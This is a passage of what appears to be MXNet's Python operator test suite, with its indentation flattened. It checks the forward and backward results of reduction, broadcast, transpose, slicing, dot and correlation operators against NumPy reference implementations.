sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
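# The reference gradient keeps the reduced axes as size-1 dims; it is broadcast back to
# the full input shape before the comparison below.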
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
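# The gradient lambdas above encode the reference backward of each reduction:
# sum/nansum reshape the output gradient to keepdim_shape (nansum zeroes NaN positions),
# mean additionally divides by the reduction size, prod/nanprod scale by outdata/data,
# max/min route the gradient only to elements equal to the reduced value, and
# norm uses d||x||_2 / dx = x / ||x||_2. The test harness broadcasts these back to the
# input shape before comparing.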
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-5 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
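# The backward pass of broadcasting is a sum-reduction over the broadcast axes, which
# is why grad_groundtruth above reduces outgrad_npy with np.sum over `axis`.
# E.g. broadcasting (2, 1, 4) -> (2, 3, 4) sums the incoming gradient over axis 1.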
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
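# getTranspAxes builds a permutation that moves a contiguous block of axes to the end,
# e.g. ndim=4 with (n1, n2)=(1, 3) gives (0, 3, 1, 2). Such permutations can be viewed
# as a single 2-D transpose over flattened groups of axes, which is presumably the
# "pseudo-2D transpose" fast path this test is meant to exercise.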
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
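# begin/end entries may be None or negative; both encodings describe the same region as
# the Python slice built in `idx`. E.g. for d=5, b=1, e=4 the pairs (1, 4), (-4, 4) and
# (1, -1) all select elements 1..3 along that axis.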
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
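# The second executor checks grad_req='add': its gradient buffer is pre-filled with
# x_grad_npy and the backward pass must accumulate into it rather than overwrite it,
# hence the expected value xx + x_grad_npy above.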
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience of testing, the third and fourth input dims should be of the form 4*x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
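# With zero conv/fc weights the localisation net always outputs loc_fc_bias, i.e. the
# affine theta [[0.5, 0, 0], [0, 0.5, 0]]. Assuming the usual normalised-grid affine
# convention, scaling the grid by 0.5 samples the central half of the input, so the
# forward/backward checks below compare against a plain center crop.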
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
continue  # only k == 1 is a valid inner dimension for the 1-D case
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
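# Reference gradients for C = A.dot(B): dA = dC.dot(B.T) and dB = A.T.dot(dC), which is
# exactly what agrad_npy and bgrad_npy compute in the loop above. The transpose variants
# are covered separately by the numeric gradient checker.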
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
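# A sketch of the shape bookkeeping used above for the Correlation op:
#   padded = in + 2*pad, border = max_displacement + (kernel-1)//2,
#   top_h/top_w = (padded - 2*border) // stride1,
#   top_channels = (2*(max_displacement//stride2) + 1)**2.
# E.g. a 10x10 input with pad=4, max_displacement=4, kernel=1, stride1=stride2=1 gives
# padded=18, border=4, a 10x10 output and 81 output channels.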
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
